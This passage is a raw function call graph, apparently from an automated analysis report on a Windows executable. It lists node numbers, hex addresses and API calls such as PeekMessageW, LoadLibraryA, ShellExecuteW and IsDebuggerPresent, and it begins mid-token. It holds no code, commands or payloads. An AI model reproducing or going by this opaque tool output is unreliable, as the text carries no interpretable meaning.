_abort 104761->104767 104764 b608e6 104766->104759 104767->104763 104768->104764 104769 b9400f 104785 b4eeb0 ISource 104769->104785 104770 b4f211 PeekMessageW 104770->104785 104771 b4f0d5 104772 b4ef07 GetInputState 104772->104770 104772->104785 104774 b932cd TranslateAcceleratorW 104774->104785 104775 b4f104 timeGetTime 104775->104785 104776 b4f273 TranslateMessage DispatchMessageW 104777 b4f28f PeekMessageW 104776->104777 104777->104785 104778 b4f2af Sleep 104795 b4f2c0 104778->104795 104779 b94183 Sleep 104779->104795 104780 b933e9 timeGetTime 104832 b5aa65 23 API calls 104780->104832 104781 b5f215 timeGetTime 104781->104795 104783 badd87 47 API calls 104783->104795 104784 b9421a GetExitCodeProcess 104788 b94230 WaitForSingleObject 104784->104788 104789 b94246 CloseHandle 104784->104789 104785->104770 104785->104771 104785->104772 104785->104774 104785->104775 104785->104776 104785->104777 104785->104778 104785->104779 104785->104780 104798 b50340 191 API calls 104785->104798 104799 b52b20 191 API calls 104785->104799 104801 b4f450 104785->104801 104808 b4f6d0 104785->104808 104831 b5e915 IsDialogMessageW GetClassLongW 104785->104831 104833 bb446f 22 API calls 104785->104833 104834 bb3fe1 82 API calls __wsopen_s 104785->104834 104786 bd345b GetForegroundWindow 104786->104795 104787 b93d51 104791 b93d59 104787->104791 104788->104785 104788->104789 104789->104795 104792 b942b8 Sleep 104792->104785 104795->104781 104795->104783 104795->104784 104795->104785 104795->104786 104795->104787 104795->104792 104835 bc60b5 22 API calls 104795->104835 104836 baf292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104795->104836 104798->104785 104799->104785 104802 b4f46f 104801->104802 104804 b4f483 104801->104804 104837 b4e960 104802->104837 104869 bb3fe1 82 API calls __wsopen_s 104804->104869 104806 b4f47a 104806->104785 104807 b94584 104807->104807 104809 b4f6ef 104808->104809 104821 b4f7dc ISource 104809->104821 104878 b605b2 5 API calls __Init_thread_wait 104809->104878 104810 b50340 191 API calls 104810->104821 104813 b945d9 104815 b4bf73 22 API calls 104813->104815 104813->104821 104814 b4bf73 22 API calls 104814->104821 104816 b945f3 104815->104816 104879 b60413 29 API calls __onexit 104816->104879 104817 b4be2d 40 API calls 104817->104821 104820 bb3fe1 82 API calls 104820->104821 104821->104810 104821->104814 104821->104817 104821->104820 104826 b4bed9 22 API calls 104821->104826 104827 b51ca0 22 API calls 104821->104827 104828 b4fae1 104821->104828 104877 b5b35c 191 API calls 104821->104877 104881 b605b2 5 API calls __Init_thread_wait 104821->104881 104882 b60413 29 API calls __onexit 104821->104882 104883 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104821->104883 104884 bc5231 102 API calls 104821->104884 104885 bc731e 191 API calls 104821->104885 104822 b945fd 104880 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104822->104880 104826->104821 104827->104821 104828->104785 104831->104785 104832->104785 104833->104785 104834->104785 104835->104795 104836->104795 104838 b50340 191 API calls 104837->104838 104856 b4e99d 104838->104856 104839 b931d3 104876 bb3fe1 82 API calls __wsopen_s 104839->104876 104841 b4ea0b ISource 104841->104806 104842 b4edd5 104842->104841 104852 b6017b 22 API calls 104842->104852 104843 b4eac3 104843->104842 104844 b4eace 104843->104844 104846 b6014b 22 API calls 104844->104846 104845 b4ecff 104847 b4ed14 104845->104847 104848 b931c4 104845->104848 104857 b4ead5 __fread_nolock 104846->104857 104850 b6014b 22 API calls 104847->104850 104875 bc6162 22 API calls 104848->104875 104849 b4ebb8 104854 b6017b 22 API calls 104849->104854 104855 b4eb6a 104850->104855 104852->104857 104853 b4eb29 ISource __fread_nolock 104853->104845 104853->104855 104862 b931b3 104853->104862 104865 b9318e 104853->104865 104867 b9316c 104853->104867 104871 b444fe 191 API calls 104853->104871 104854->104853 104855->104806 104856->104839 104856->104841 104856->104842 104856->104843 104856->104849 104856->104853 104859 b6014b 22 API calls 104856->104859 104858 b6014b 22 API calls 104857->104858 104860 b4eaf6 104857->104860 104858->104860 104859->104856 104860->104853 104870 b4d260 191 API calls 104860->104870 104874 bb3fe1 82 API calls __wsopen_s 104862->104874 104873 bb3fe1 82 API calls __wsopen_s 104865->104873 104872 bb3fe1 82 API calls __wsopen_s 104867->104872 104869->104807 104870->104853 104871->104853 104872->104855 104873->104855 104874->104855 104875->104839 104876->104841 104877->104821 104878->104813 104879->104822 104880->104821 104881->104821 104882->104821 104883->104821 104884->104821 104885->104821 104886 b5f9a3 104887 b5f9ad 104886->104887 104888 b5f9ce 104886->104888 104889 b4c3ab 22 API calls 104887->104889 104894 b9fb3c 104888->104894 104895 ba56ae 22 API calls ISource 104888->104895 104891 b5f9bd 104889->104891 104892 b4c3ab 22 API calls 104891->104892 104893 b5f9cd 104892->104893 104895->104888 104896 b6f06e 104897 b6f07a ___scrt_is_nonwritable_in_current_image 104896->104897 104898 b6f086 104897->104898 104899 b6f09b 104897->104899 104915 b6f649 20 API calls __dosmaperr 104898->104915 104909 b694fd EnterCriticalSection 104899->104909 104902 b6f08b 104916 b72b5c 26 API calls ___std_exception_copy 104902->104916 104903 b6f0a7 104910 b6f0db 104903->104910 104908 b6f096 __wsopen_s 104909->104903 104918 b6f106 104910->104918 104912 b6f0e8 104913 b6f0b4 104912->104913 104938 b6f649 20 API calls __dosmaperr 104912->104938 104917 b6f0d1 LeaveCriticalSection __fread_nolock 104913->104917 104915->104902 104916->104908 104917->104908 104919 b6f114 104918->104919 104920 b6f12e 104918->104920 104942 b6f649 20 API calls __dosmaperr 104919->104942 104922 b6dcc5 __fread_nolock 26 API calls 104920->104922 104924 b6f137 104922->104924 104923 b6f119 104943 b72b5c 26 API calls ___std_exception_copy 104923->104943 104939 b79789 104924->104939 104928 b6f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104928->104912 104929 b6f1bf 104932 b6f1dc 104929->104932 104937 b6f1ee 104929->104937 104930 b6f23b 104931 b6f248 104930->104931 104930->104937 104945 b6f649 20 API calls __dosmaperr 104931->104945 104944 b6f41f 31 API calls 4 library calls 104932->104944 104935 b6f1e6 104935->104928 104937->104928 104946 b6f29b 30 API calls 2 library calls 104937->104946 104938->104913 104947 b79606 104939->104947 104941 b6f153 104941->104928 104941->104929 104941->104930 104942->104923 104943->104928 104944->104935 104945->104928 104946->104928 104948 b79612 ___scrt_is_nonwritable_in_current_image 104947->104948 104949 b79632 104948->104949 104950 b7961a 104948->104950 104952 b796e6 104949->104952 104956 b7966a 104949->104956 104973 b6f636 20 API calls __dosmaperr 104950->104973 104978 b6f636 20 API calls __dosmaperr 104952->104978 104954 b7961f 104974 b6f649 20 API calls __dosmaperr 104954->104974 104955 b796eb 104979 b6f649 20 API calls __dosmaperr 104955->104979 104972 b754ba EnterCriticalSection 104956->104972 104960 b79627 __wsopen_s 104960->104941 104961 b796f3 104980 b72b5c 26 API calls ___std_exception_copy 104961->104980 104962 b79670 104964 b79694 104962->104964 104965 b796a9 104962->104965 104975 b6f649 20 API calls __dosmaperr 104964->104975 104967 b7970b __wsopen_s 28 API calls 104965->104967 104969 b796a4 104967->104969 104968 b79699 104976 b6f636 20 API calls __dosmaperr 104968->104976 104977 b796de LeaveCriticalSection __wsopen_s 104969->104977 104972->104962 104973->104954 104974->104960 104975->104968 104976->104969 104977->104960 104978->104955 104979->104961 104980->104960 104981 b82782 104984 b42ab0 104981->104984 104985 b83a1a DestroyWindow 104984->104985 104986 b42aef mciSendStringW 104984->104986 104998 b83a26 104985->104998 104987 b42d66 104986->104987 104988 b42b0b 104986->104988 104987->104988 104990 b42d75 UnregisterHotKey 104987->104990 104989 b42b19 104988->104989 104988->104998 105020 b42ede 104989->105020 104990->104987 104992 b83a44 FindClose 104992->104998 104994 b83a6b 104997 b83a7e FreeLibrary 104994->104997 104999 b83a8f 104994->104999 104996 b42b2e 104996->104999 105006 b42b3c 104996->105006 104997->104994 104998->104992 104998->104994 105031 b47aab 104998->105031 105000 b83aa3 VirtualFree 104999->105000 105001 b83ad1 104999->105001 105000->104999 105003 b42ba9 105001->105003 105024 bb0b4c 105001->105024 105002 b42b98 CoUninitialize 105002->105001 105002->105003 105004 b42bb4 105003->105004 105005 b83aeb 105003->105005 105008 b42bc4 105004->105008 105012 b83afa ISource 105005->105012 105035 bb3d30 6 API calls ISource 105005->105035 105006->105002 105029 b42ff4 24 API calls 105008->105029 105010 b42bda 105030 b42e1c 22 API calls 105010->105030 105014 b83b89 105012->105014 105036 ba6e3b 22 API calls ISource 105012->105036 105022 b42eeb 105020->105022 105021 b42b20 105021->104994 105021->104996 105022->105021 105037 ba7991 22 API calls 105022->105037 105038 bb1312 105024->105038 105027 bb0b7f DeleteCriticalSection 105027->105003 105028 bb0b6b 105028->105027 105029->105010 105032 b47ac4 105031->105032 105033 b47ab5 105031->105033 105032->105033 105034 b47ac9 CloseHandle 105032->105034 105033->104998 105034->105033 105035->105005 105036->105012 105037->105022 105039 bb131b InterlockedExchange 105038->105039 105040 bb0b5a CloseHandle 105038->105040 105039->105040 105041 bb132f EnterCriticalSection TerminateThread WaitForSingleObject 105039->105041 105040->105028 105042 bb1369 InterlockedExchange LeaveCriticalSection 105041->105042 105043 bb135c CloseHandle 105041->105043 105042->105040 105043->105042 105044 b91ac5 105045 b91acd 105044->105045 105048 b4d535 105044->105048 105075 ba7a87 22 API calls __fread_nolock 105045->105075 105047 b91adf 105076 ba7a00 22 API calls __fread_nolock 105047->105076 105050 b6014b 22 API calls 105048->105050 105052 b4d589 105050->105052 105051 b91b09 105053 b50340 191 API calls 105051->105053 105055 b4c32d 22 API calls 105052->105055 105054 b91b30 105053->105054 105056 b91b44 105054->105056 105077 bc61a2 54 API calls _wcslen 105054->105077 105058 b4d5b3 105055->105058 105059 b6014b 22 API calls 105058->105059 105067 b4d66e ISource 105059->105067 105060 b91b61 105060->105048 105078 ba7a87 22 API calls __fread_nolock 105060->105078 105062 b4c3ab 22 API calls 105072 b4d9ac ISource 105062->105072 105065 b4dd30 105066 b91f79 105080 ba56ae 22 API calls ISource 105066->105080 105067->105066 105068 b91f94 105067->105068 105070 b4bed9 22 API calls 105067->105070 105071 b4c3ab 22 API calls 105067->105071 105073 b4d911 ISource 105067->105073 105079 b4b4c8 22 API calls 105067->105079 105070->105067 105071->105067 105072->105065 105074 b5e30a 22 API calls ISource 105072->105074 105073->105062 105073->105072 105074->105072 105075->105047 105076->105051 105077->105060 105078->105060 105079->105067 105080->105068 105081 b7316b GetLastError 105082 b73184 105081->105082 105083 b7318a 105081->105083 105107 b73581 11 API calls 2 library calls 105082->105107 105087 b731e1 SetLastError 105083->105087 105100 b74ff0 105083->105100 105090 b731ea 105087->105090 105088 b731a4 105092 b72d38 _free 17 API calls 105088->105092 105091 b731b9 105091->105088 105094 b731c0 105091->105094 105093 b731aa 105092->105093 105095 b731d8 SetLastError 105093->105095 105109 b72f56 20 API calls __dosmaperr 105094->105109 105095->105090 105097 b731cb 105098 b72d38 _free 17 API calls 105097->105098 105099 b731d1 105098->105099 105099->105087 105099->105095 105106 b74ffd __dosmaperr 105100->105106 105101 b7503d 105111 b6f649 20 API calls __dosmaperr 105101->105111 105102 b75028 RtlAllocateHeap 105103 b7319c 105102->105103 105102->105106 105103->105088 105108 b735d7 11 API calls 2 library calls 105103->105108 105106->105101 105106->105102 105110 b6521d 7 API calls 2 library calls 105106->105110 105107->105083 105108->105091 105109->105097 105110->105106 105111->105103 105112 b6076b 105113 b60777 ___scrt_is_nonwritable_in_current_image 105112->105113 105142 b60221 105113->105142 105115 b6077e 105116 b608d1 105115->105116 105120 b607a8 105115->105120 105183 b60baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 105116->105183 105118 b608d8 105176 b651c2 105118->105176 105131 b607e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 105120->105131 105153 b727ed 105120->105153 105125 b607c7 105128 b60848 105161 b60cc9 105128->105161 105130 b6084e 105165 b4331b 105130->105165 105131->105128 105179 b6518a 38 API calls 2 library calls 105131->105179 105136 b6086a 105136->105118 105137 b6086e 105136->105137 105138 b60877 105137->105138 105181 b65165 28 API calls _abort 105137->105181 105182 b603b0 13 API calls 2 library calls 105138->105182 105141 b6087f 105141->105125 105143 b6022a 105142->105143 105185 b60a08 IsProcessorFeaturePresent 105143->105185 105145 b60236 105186 b63004 10 API calls 3 library calls 105145->105186 105147 b6023b 105152 b6023f 105147->105152 105187 b72687 105147->105187 105150 b60256 105150->105115 105152->105115 105154 b72804 105153->105154 105155 b60dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 105154->105155 105156 b607c1 105155->105156 105156->105125 105157 b72791 105156->105157 105160 b727c0 105157->105160 105158 b60dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 105159 b727e9 105158->105159 105159->105131 105160->105158 105210 b626b0 105161->105210 105164 b60cef 105164->105130 105166 b43382 105165->105166 105167 b43327 IsThemeActive 105165->105167 105180 b60d02 GetModuleHandleW 105166->105180 105212 b652b3 105167->105212 105169 b43352 105218 b65319 105169->105218 105171 b43359 105225 b432e6 SystemParametersInfoW SystemParametersInfoW 105171->105225 105173 b43360 105226 b4338b 105173->105226 105175 b43368 SystemParametersInfoW 105175->105166 106020 b64f3f 105176->106020 105179->105128 105180->105136 105181->105138 105182->105141 105183->105118 105185->105145 105186->105147 105191 b7d576 105187->105191 105190 b6302d 8 API calls 3 library calls 105190->105152 105194 b7d593 105191->105194 105195 b7d58f 105191->105195 105193 b60248 105193->105150 105193->105190 105194->105195 105197 b74eb8 105194->105197 105202 b60dfc 105195->105202 105198 b74ebf 105197->105198 105199 b74f02 GetStdHandle 105198->105199 105200 b74f6a 105198->105200 105201 b74f15 GetFileType 105198->105201 105199->105198 105200->105194 105201->105198 105203 b60e07 IsProcessorFeaturePresent 105202->105203 105204 b60e05 105202->105204 105206 b60fce 105203->105206 105204->105193 105209 b60f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 105206->105209 105208 b610b1 105208->105193 105209->105208 105211 b60cdc GetStartupInfoW 105210->105211 105211->105164 105213 b652bf ___scrt_is_nonwritable_in_current_image 105212->105213 105275 b732d1 EnterCriticalSection 105213->105275 105215 b652ca pre_c_initialization 105276 b6530a 105215->105276 105217 b652ff __wsopen_s 105217->105169 105219 b65325 105218->105219 105220 b6533f 105218->105220 105219->105220 105280 b6f649 20 API calls __dosmaperr 105219->105280 105220->105171 105222 b6532f 105281 b72b5c 26 API calls ___std_exception_copy 105222->105281 105224 b6533a 105224->105171 105225->105173 105227 b4339b __wsopen_s 105226->105227 105228 b4bf73 22 API calls 105227->105228 105229 b433a7 GetCurrentDirectoryW 105228->105229 105282 b44fd9 105229->105282 105231 b433ce IsDebuggerPresent 105232 b433dc 105231->105232 105233 b83ca3 MessageBoxA 105231->105233 105234 b83cbb 105232->105234 105235 b433f0 105232->105235 105233->105234 105386 b44176 22 API calls 105234->105386 105350 b43a95 105235->105350 105242 b43462 105244 b83cec SetCurrentDirectoryW 105242->105244 105245 b4346a 105242->105245 105244->105245 105246 b43475 105245->105246 105387 ba1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 105245->105387 105382 b434d3 7 API calls 105246->105382 105249 b83d07 105249->105246 105252 b83d19 105249->105252 105254 b45594 24 API calls 105252->105254 105253 b4347f 105256 b4396b 61 API calls 105253->105256 105259 b43494 105253->105259 105255 b83d22 105254->105255 105257 b4b329 22 API calls 105255->105257 105256->105259 105260 b83d30 105257->105260 105258 b434af 105265 b434b6 SetCurrentDirectoryW 105258->105265 105259->105258 105261 b43907 Shell_NotifyIconW 105259->105261 105262 b83d38 105260->105262 105263 b83d5f 105260->105263 105261->105258 105264 b46b7c 22 API calls 105262->105264 105266 b46b7c 22 API calls 105263->105266 105267 b83d43 105264->105267 105268 b434ca 105265->105268 105269 b83d5b GetForegroundWindow ShellExecuteW 105266->105269 105388 b47bb5 22 API calls 105267->105388 105268->105175 105273 b83d90 105269->105273 105272 b83d51 105274 b46b7c 22 API calls 105272->105274 105273->105258 105274->105269 105275->105215 105279 b73319 LeaveCriticalSection 105276->105279 105278 b65311 105278->105217 105279->105278 105280->105222 105281->105224 105283 b4bf73 22 API calls 105282->105283 105284 b44fef 105283->105284 105389 b463d7 105284->105389 105286 b4500d 105287 b4bd57 22 API calls 105286->105287 105288 b45021 105287->105288 105289 b4bed9 22 API calls 105288->105289 105290 b4502c 105289->105290 105403 b4893c 105290->105403 105293 b4b329 22 API calls 105294 b45045 105293->105294 105295 b4be2d 40 API calls 105294->105295 105296 b45055 105295->105296 105297 b4b329 22 API calls 105296->105297 105298 b4507b 105297->105298 105299 b4be2d 40 API calls 105298->105299 105300 b4508a 105299->105300 105301 b4bf73 22 API calls 105300->105301 105302 b450a8 105301->105302 105406 b451ca 105302->105406 105305 b64d98 _strftime 40 API calls 105306 b450c2 105305->105306 105307 b450cc 105306->105307 105308 b84b23 105306->105308 105309 b64d98 _strftime 40 API calls 105307->105309 105310 b451ca 22 API calls 105308->105310 105311 b450d7 105309->105311 105312 b84b37 105310->105312 105311->105312 105313 b450e1 105311->105313 105315 b451ca 22 API calls 105312->105315 105314 b64d98 _strftime 40 API calls 105313->105314 105316 b450ec 105314->105316 105317 b84b53 105315->105317 105316->105317 105318 b450f6 105316->105318 105319 b45594 24 API calls 105317->105319 105320 b64d98 _strftime 40 API calls 105318->105320 105321 b84b76 105319->105321 105322 b45101 105320->105322 105323 b451ca 22 API calls 105321->105323 105324 b84b9f 105322->105324 105325 b4510b 105322->105325 105326 b84b82 105323->105326 105328 b451ca 22 API calls 105324->105328 105327 b4512e 105325->105327 105330 b4bed9 22 API calls 105325->105330 105329 b4bed9 22 API calls 105326->105329 105332 b84bda 105327->105332 105333 b47e12 22 API calls 105327->105333 105331 b84bbd 105328->105331 105334 b84b90 105329->105334 105335 b45121 105330->105335 105336 b4bed9 22 API calls 105331->105336 105337 b4513e 105333->105337 105338 b451ca 22 API calls 105334->105338 105339 b451ca 22 API calls 105335->105339 105340 b84bcb 105336->105340 105341 b48470 22 API calls 105337->105341 105338->105324 105339->105327 105342 b451ca 22 API calls 105340->105342 105343 b4514c 105341->105343 105342->105332 105412 b48a60 105343->105412 105345 b4893c 22 API calls 105347 b45167 105345->105347 105346 b48a60 22 API calls 105346->105347 105347->105345 105347->105346 105348 b451ab 105347->105348 105349 b451ca 22 API calls 105347->105349 105348->105231 105349->105347 105351 b43aa2 __wsopen_s 105350->105351 105352 b840da ___scrt_fastfail 105351->105352 105353 b43abb 105351->105353 105355 b840f6 GetOpenFileNameW 105352->105355 105354 b45851 23 API calls 105353->105354 105356 b43ac4 105354->105356 105357 b84145 105355->105357 105428 b43a57 105356->105428 105360 b48577 22 API calls 105357->105360 105362 b8415a 105360->105362 105362->105362 105363 b43ad9 105446 b462d5 105363->105446 106019 b43624 7 API calls 105382->106019 105384 b4347a 105385 b435b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105384->105385 105385->105253 105386->105242 105387->105249 105388->105272 105390 b463e4 __wsopen_s 105389->105390 105391 b48577 22 API calls 105390->105391 105392 b46416 105390->105392 105391->105392 105394 b4644c 105392->105394 105423 b4655e 105392->105423 105395 b4651a 105394->105395 105398 b4b329 22 API calls 105394->105398 105401 b4655e 22 API calls 105394->105401 105402 b46a7c 22 API calls 105394->105402 105396 b4b329 22 API calls 105395->105396 105399 b4654f 105395->105399 105397 b46543 105396->105397 105400 b46a7c 22 API calls 105397->105400 105398->105394 105399->105286 105400->105399 105401->105394 105402->105394 105404 b6014b 22 API calls 105403->105404 105405 b45038 105404->105405 105405->105293 105407 b451d4 105406->105407 105408 b451f2 105406->105408 105410 b4bed9 22 API calls 105407->105410 105411 b450b4 105407->105411 105409 b48577 22 API calls 105408->105409 105409->105411 105410->105411 105411->105305 105413 b48a76 105412->105413 105414 b86737 105413->105414 105421 b48a80 105413->105421 105426 b5b7a2 22 API calls 105414->105426 105415 b86744 105427 b4b4c8 22 API calls 105415->105427 105418 b86762 105418->105418 105419 b48b94 105420 b6014b 22 API calls 105419->105420 105422 b48b9b 105420->105422 105421->105415 105421->105419 105421->105422 105422->105347 105424 b4c2c9 22 API calls 105423->105424 105425 b46569 105424->105425 105425->105392 105426->105415 105427->105418 105429 b822d0 __wsopen_s 105428->105429 105430 b43a64 GetLongPathNameW 105429->105430 105431 b48577 22 API calls 105430->105431 105432 b43a8c 105431->105432 105433 b453f2 105432->105433 105434 b4bf73 22 API calls 105433->105434 105435 b45404 105434->105435 105436 b45851 23 API calls 105435->105436 105437 b4540f 105436->105437 105438 b4541a 105437->105438 105443 b84d5b 105437->105443 105440 b46a7c 22 API calls 105438->105440 105441 b45426 105440->105441 105476 b41340 105441->105476 105442 b84d7d 105443->105442 105482 b5e36b 41 API calls 105443->105482 105445 b45439 105445->105363 105483 b46679 105446->105483 105449 b85336 105608 bb36b8 105449->105608 105451 b46679 94 API calls 105453 b4630e 105451->105453 105452 b85347 105454 b85368 105452->105454 105455 b8534b 105452->105455 105453->105449 105456 b46316 105453->105456 105460 b6017b 22 API calls 105454->105460 105657 b466e7 105455->105657 105457 b46322 105456->105457 105458 b85353 105456->105458 105505 b43b39 105457->105505 105663 bae30e 82 API calls 105458->105663 105475 b853ad 105460->105475 105464 b85361 105464->105454 105465 b8555e 105470 b85566 105465->105470 105466 b466e7 68 API calls 105466->105470 105470->105466 105665 baa215 82 API calls __wsopen_s 105470->105665 105472 b4b329 22 API calls 105472->105475 105475->105465 105475->105470 105475->105472 105634 ba9ff8 105475->105634 105637 bb1519 105475->105637 105643 b4bba9 105475->105643 105651 b45d21 105475->105651 105664 ba9f27 42 API calls _wcslen 105475->105664 105477 b41352 105476->105477 105481 b41371 __fread_nolock 105476->105481 105480 b6017b 22 API calls 105477->105480 105478 b6014b 22 API calls 105479 b41388 105478->105479 105479->105445 105480->105481 105481->105478 105482->105443 105666 b4663e LoadLibraryA 105483->105666 105488 b85648 105490 b466e7 68 API calls 105488->105490 105489 b466a4 LoadLibraryExW 105674 b46607 LoadLibraryA 105489->105674 105492 b8564f 105490->105492 105494 b46607 3 API calls 105492->105494 105496 b85657 105494->105496 105695 b4684a 105496->105695 105497 b466ce 105497->105496 105498 b466da 105497->105498 105499 b466e7 68 API calls 105498->105499 105501 b462fa 105499->105501 105501->105449 105501->105451 105504 b8567e 105506 b43b62 105505->105506 105507 b8415f 105505->105507 105509 b6017b 22 API calls 105506->105509 105873 baa215 82 API calls __wsopen_s 105507->105873 105510 b43b86 105509->105510 105511 b47aab CloseHandle 105510->105511 105512 b43b94 105511->105512 105513 b4bf73 22 API calls 105512->105513 105516 b43b9d 105513->105516 105514 b43bfa 105517 b4bf73 22 API calls 105514->105517 105515 b43bec 105515->105514 105518 b84179 105515->105518 105874 bad5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 105515->105874 105519 b47aab CloseHandle 105516->105519 105520 b43c06 105517->105520 105518->105514 105518->105515 105521 b43ba6 105519->105521 105847 b43ae9 105520->105847 105524 b47aab CloseHandle 105521->105524 105527 b43baf 105524->105527 105525 b841d5 105525->105514 105861 b46fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 105527->105861 105528 b4bf73 22 API calls 105530 b43c1e 105528->105530 105532 b45851 23 API calls 105530->105532 105531 b43bc9 105533 b43bd1 105531->105533 105534 b84591 105531->105534 105536 b43c2c 105532->105536 105862 b46c5f 27 API calls ISource 105533->105862 105882 baa215 82 API calls __wsopen_s 105534->105882 105852 b43b1c 105536->105852 105537 b845a6 105537->105537 105542 b43be3 105863 b46c48 SetFilePointerEx SetFilePointerEx SetFilePointerEx 105542->105863 105545 b43c6f 105547 b4bf73 22 API calls 105545->105547 105546 b841eb 105548 b47aab CloseHandle 105546->105548 105549 b43c78 105547->105549 105550 b841f4 105548->105550 105551 b4bf73 22 API calls 105549->105551 105552 b46679 94 API calls 105550->105552 105553 b43c81 105551->105553 105554 b8421c 105552->105554 105609 bb36d4 105608->105609 105610 b46874 64 API calls 105609->105610 105611 bb36e8 105610->105611 105891 bb3827 105611->105891 105614 b4684a 40 API calls 105615 bb3717 105614->105615 105616 b4684a 40 API calls 105615->105616 105617 bb3727 105616->105617 105618 b4684a 40 API calls 105617->105618 105619 bb3742 105618->105619 105620 b4684a 40 API calls 105619->105620 105621 bb375d 105620->105621 105622 b46874 64 API calls 105621->105622 105623 bb3774 105622->105623 105624 b6ed7c ___std_exception_copy 21 API calls 105623->105624 105625 bb377b 105624->105625 105626 b6ed7c ___std_exception_copy 21 API calls 105625->105626 105627 bb3785 105626->105627 105628 b4684a 40 API calls 105627->105628 105629 bb3799 105628->105629 105630 bb32bd 27 API calls 105629->105630 105631 bb37af 105630->105631 105632 bb3700 105631->105632 105897 bb2c8d 105631->105897 105632->105452 105635 b6017b 22 API calls 105634->105635 105636 baa028 __fread_nolock 105635->105636 105636->105475 105638 bb1524 105637->105638 105639 b6014b 22 API calls 105638->105639 105640 bb153b 105639->105640 105641 b4b329 22 API calls 105640->105641 105642 bb1546 105641->105642 105642->105475 105644 b4bc33 105643->105644 105650 b4bbb9 __fread_nolock 105643->105650 105646 b6017b 22 API calls 105644->105646 105645 b6014b 22 API calls 105647 b4bbc0 105645->105647 105646->105650 105648 b6014b 22 API calls 105647->105648 105649 b4bbde 105647->105649 105648->105649 105649->105475 105650->105645 105652 b45d34 105651->105652 105656 b45dd8 105651->105656 105653 b6017b 22 API calls 105652->105653 105655 b45d66 105652->105655 105653->105655 105654 b6014b 22 API calls 105654->105655 105655->105654 105655->105656 105656->105475 105658 b466f1 105657->105658 105659 b466f8 105657->105659 105660 b6e9e8 67 API calls 105658->105660 105661 b4670f 105659->105661 105662 b856a4 FreeLibrary 105659->105662 105660->105659 105661->105458 105663->105464 105664->105475 105665->105470 105667 b46674 105666->105667 105668 b46656 GetProcAddress 105666->105668 105671 b6e95b 105667->105671 105669 b46666 105668->105669 105669->105667 105670 b4666d FreeLibrary 105669->105670 105670->105667 105703 b6e89a 105671->105703 105673 b46698 105673->105488 105673->105489 105675 b4661c GetProcAddress 105674->105675 105676 b4663b 105674->105676 105677 b4662c 105675->105677 105679 b46720 105676->105679 105677->105676 105678 b46634 FreeLibrary 105677->105678 105678->105676 105680 b6017b 22 API calls 105679->105680 105681 b46735 105680->105681 105682 b4423c 22 API calls 105681->105682 105683 b46741 __fread_nolock 105682->105683 105684 b856c2 105683->105684 105691 b4677c 105683->105691 105760 bb3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 105683->105760 105761 bb3a92 74 API calls 105684->105761 105687 b4684a 40 API calls 105687->105691 105688 b46810 ISource 105688->105497 105689 b46874 64 API calls 105689->105691 105690 b85706 105755 b46874 105690->105755 105691->105687 105691->105688 105691->105689 105691->105690 105694 b4684a 40 API calls 105694->105688 105696 b85760 105695->105696 105697 b4685c 105695->105697 105793 b6ec34 105697->105793 105700 bb32bd 105830 bb310d 105700->105830 105702 bb32d8 105702->105504 105706 b6e8a6 ___scrt_is_nonwritable_in_current_image 105703->105706 105704 b6e8b4 105728 b6f649 20 API calls __dosmaperr 105704->105728 105706->105704 105708 b6e8e4 105706->105708 105707 b6e8b9 105729 b72b5c 26 API calls ___std_exception_copy 105707->105729 105710 b6e8f6 105708->105710 105711 b6e8e9 105708->105711 105720 b783e1 105710->105720 105730 b6f649 20 API calls __dosmaperr 105711->105730 105714 b6e8ff 105715 b6e905 105714->105715 105716 b6e912 105714->105716 105731 b6f649 20 API calls __dosmaperr 105715->105731 105732 b6e944 LeaveCriticalSection __fread_nolock 105716->105732 105719 b6e8c4 __wsopen_s 105719->105673 105721 b783ed ___scrt_is_nonwritable_in_current_image 105720->105721 105733 b732d1 EnterCriticalSection 105721->105733 105723 b783fb 105734 b7847b 105723->105734 105727 b7842c __wsopen_s 105727->105714 105728->105707 105729->105719 105730->105719 105731->105719 105732->105719 105733->105723 105742 b7849e 105734->105742 105735 b784f7 105736 b74ff0 __dosmaperr 20 API calls 105735->105736 105737 b78500 105736->105737 105739 b72d38 _free 20 API calls 105737->105739 105740 b78509 105739->105740 105743 b78408 105740->105743 105752 b73778 11 API calls 2 library calls 105740->105752 105742->105735 105742->105743 105750 b694fd EnterCriticalSection 105742->105750 105751 b69511 LeaveCriticalSection 105742->105751 105747 b78437 105743->105747 105744 b78528 105753 b694fd EnterCriticalSection 105744->105753 105754 b73319 LeaveCriticalSection 105747->105754 105749 b7843e 105749->105727 105750->105742 105751->105742 105752->105744 105753->105743 105754->105749 105756 b46883 105755->105756 105757 b85780 105755->105757 105762 b6f053 105756->105762 105760->105684 105761->105691 105765 b6ee1a 105762->105765 105764 b46891 105764->105694 105768 b6ee26 ___scrt_is_nonwritable_in_current_image 105765->105768 105766 b6ee32 105790 b6f649 20 API calls __dosmaperr 105766->105790 105768->105766 105769 b6ee58 105768->105769 105778 b694fd EnterCriticalSection 105769->105778 105771 b6ee37 105791 b72b5c 26 API calls ___std_exception_copy 105771->105791 105772 b6ee64 105779 b6ef7a 105772->105779 105775 b6ee78 105792 b6ee97 LeaveCriticalSection __fread_nolock 105775->105792 105777 b6ee42 __wsopen_s 105777->105764 105778->105772 105780 b6ef9c 105779->105780 105781 b6ef8c 105779->105781 105783 b6eea1 28 API calls 105780->105783 105782 b6f649 __dosmaperr 20 API calls 105781->105782 105784 b6ef91 105782->105784 105786 b6efbf 105783->105786 105784->105775 105785 b6f03e 105785->105775 105786->105785 105787 b6df7b 62 API calls 105786->105787 105788 b6efe6 105787->105788 105789 b797a4 __wsopen_s 28 API calls 105788->105789 105789->105785 105790->105771 105791->105777 